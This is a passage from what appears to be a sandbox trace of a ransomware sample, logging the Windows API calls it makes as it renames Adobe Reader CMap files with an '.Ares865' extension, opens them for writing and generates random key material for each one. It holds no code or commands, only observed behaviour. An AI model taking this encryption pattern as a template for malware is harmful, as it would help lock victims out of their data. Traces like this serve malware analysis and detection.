(x86)\\adobe\\reader 10.0\\resource\\cmap\\euc-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\euc-v.ares865"), dwFlags=0x1) returned 1 [0161.917] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\euc-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.917] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3397) returned 1 [0161.917] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.918] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.918] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.923] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.923] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.923] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.924] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Ext-RKSJ-H" | out: lpString1="Ext-RKSJ-H") returned="Ext-RKSJ-H" [0161.924] lstrlenW (lpString="Ext-RKSJ-H") returned 10 [0161.924] lstrlenW (lpString="Ares865") returned 7 [0161.924] lstrcmpiW (lpString1="-RKSJ-H", lpString2="Ares865") returned 1 [0161.924] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-H.Ares865") returned 73 [0161.924] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ext-rksj-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ext-rksj-h.ares865"), dwFlags=0x1) returned 1 [0161.926] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ext-rksj-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.926] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16444) returned 1 [0161.927] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.927] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.927] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.930] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.931] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.931] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.932] lstrcpyW (in: lpString1=0x2cce46e, lpString2="Ext-RKSJ-V" | out: lpString1="Ext-RKSJ-V") returned="Ext-RKSJ-V" [0161.932] lstrlenW (lpString="Ext-RKSJ-V") returned 10 [0161.932] lstrlenW (lpString="Ares865") returned 7 [0161.932] lstrcmpiW (lpString1="-RKSJ-V", lpString2="Ares865") returned 1 [0161.932] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-V.Ares865") returned 73 [0161.932] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ext-rksj-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ext-rksj-v.ares865"), dwFlags=0x1) returned 1 [0161.934] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Ext-RKSJ-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ext-rksj-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.934] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3667) returned 1 [0161.934] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.935] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.935] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.939] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.945] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.945] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.946] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GB-EUC-H" | out: lpString1="GB-EUC-H") returned="GB-EUC-H" [0161.946] lstrlenW (lpString="GB-EUC-H") returned 8 [0161.946] lstrlenW (lpString="Ares865") returned 7 [0161.946] lstrcmpiW (lpString1="B-EUC-H", lpString2="Ares865") returned 1 [0161.946] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-H.Ares865") returned 71 [0161.946] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gb-euc-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gb-euc-h.ares865"), dwFlags=0x1) returned 1 [0161.953] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gb-euc-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.954] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4669) returned 1 [0161.954] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.955] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.955] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.959] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.960] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.960] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.960] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GB-EUC-V" | out: lpString1="GB-EUC-V") returned="GB-EUC-V" [0161.960] lstrlenW (lpString="GB-EUC-V") returned 8 [0161.960] lstrlenW (lpString="Ares865") returned 7 [0161.960] lstrcmpiW (lpString1="B-EUC-V", lpString2="Ares865") returned 1 [0161.961] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-V.Ares865") returned 71 [0161.961] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gb-euc-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gb-euc-v.ares865"), dwFlags=0x1) returned 1 [0161.962] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gb-euc-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.963] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3267) returned 1 [0161.963] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.964] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.964] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.966] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.967] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.967] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.967] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBK-EUC-H" | out: lpString1="GBK-EUC-H") returned="GBK-EUC-H" [0161.967] lstrlenW (lpString="GBK-EUC-H") returned 9 [0161.967] lstrlenW (lpString="Ares865") returned 7 [0161.967] lstrcmpiW (lpString1="K-EUC-H", lpString2="Ares865") returned 1 [0161.968] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-H.Ares865") returned 72 [0161.968] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-h.ares865"), dwFlags=0x1) returned 1 [0161.969] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.970] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=87444) returned 1 [0161.970] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.971] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.971] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.977] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.977] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.977] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.979] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBK-EUC-UCS2" | out: lpString1="GBK-EUC-UCS2") returned="GBK-EUC-UCS2" [0161.979] lstrlenW (lpString="GBK-EUC-UCS2") returned 12 [0161.979] lstrlenW (lpString="Ares865") returned 7 [0161.979] lstrcmpiW (lpString1="UC-UCS2", lpString2="Ares865") returned 1 [0161.979] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-UCS2.Ares865") returned 75 [0161.979] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-ucs2"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-ucs2.ares865"), dwFlags=0x1) returned 1 [0161.981] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-UCS2.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-ucs2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.981] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=233552) returned 1 [0161.982] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.982] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.982] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.012] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.013] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.013] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.018] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBK-EUC-V" | out: lpString1="GBK-EUC-V") returned="GBK-EUC-V" [0162.018] lstrlenW (lpString="GBK-EUC-V") returned 9 [0162.018] lstrlenW (lpString="Ares865") returned 7 [0162.018] lstrcmpiW (lpString1="K-EUC-V", lpString2="Ares865") returned 1 [0162.018] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-V.Ares865") returned 72 [0162.018] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-v.ares865"), dwFlags=0x1) returned 1 [0162.024] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.024] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3255) returned 1 [0162.025] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.026] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.026] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.030] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.031] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.031] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.032] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBK2K-H" | out: lpString1="GBK2K-H") returned="GBK2K-H" [0162.032] lstrlenW (lpString="GBK2K-H") returned 7 [0162.032] lstrlenW (lpString="Ares865") returned 7 [0162.033] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-H.Ares865") returned 70 [0162.033] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk2k-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk2k-h.ares865"), dwFlags=0x1) returned 1 [0162.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk2k-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.036] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=96320) returned 1 [0162.036] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.037] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.037] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.045] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.046] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.046] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.048] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBK2K-V" | out: lpString1="GBK2K-V") returned="GBK2K-V" [0162.048] lstrlenW (lpString="GBK2K-V") returned 7 [0162.048] lstrlenW (lpString="Ares865") returned 7 [0162.048] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-V.Ares865") returned 70 [0162.048] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk2k-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk2k-v.ares865"), dwFlags=0x1) returned 1 [0162.053] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK2K-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk2k-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.053] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3669) returned 1 [0162.053] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.054] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.054] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.058] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.059] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.059] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.059] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBKp-EUC-H" | out: lpString1="GBKp-EUC-H") returned="GBKp-EUC-H" [0162.059] lstrlenW (lpString="GBKp-EUC-H") returned 10 [0162.060] lstrlenW (lpString="Ares865") returned 7 [0162.060] lstrcmpiW (lpString1="p-EUC-H", lpString2="Ares865") returned 1 [0162.060] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-H.Ares865") returned 73 [0162.060] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbkp-euc-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbkp-euc-h.ares865"), dwFlags=0x1) returned 1 [0162.063] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbkp-euc-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.063] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=87424) returned 1 [0162.063] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.064] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.064] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.076] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.077] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.077] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.079] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBKp-EUC-V" | out: lpString1="GBKp-EUC-V") returned="GBKp-EUC-V" [0162.079] lstrlenW (lpString="GBKp-EUC-V") returned 10 [0162.079] lstrlenW (lpString="Ares865") returned 7 [0162.079] lstrcmpiW (lpString1="p-EUC-V", lpString2="Ares865") returned 1 [0162.079] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-V.Ares865") returned 73 [0162.079] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbkp-euc-v"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbkp-euc-v.ares865"), dwFlags=0x1) returned 1 [0162.083] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-V.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbkp-euc-v.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0162.083] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3261) returned 1 [0162.083] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0162.084] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0162.084] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.086] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0162.087] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0162.087] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0162.087] lstrcpyW (in: lpString1=0x2cce46e, lpString2="GBpc-EUC-H" | out: lpString1="GBpc-EUC-H") returned="GBpc-EUC-H" [0162.088] lstrlenW (lpString="GBpc-EUC-H") returned 10 [0162.088] lstrlenW (lpString="Ares865") returned 7 [0162.088] lstrcmpiW (lpString1="c-EUC-H", lpString2="Ares865") returned 1 [0162.088] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-H.Ares865") returned 73 [0162.088] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 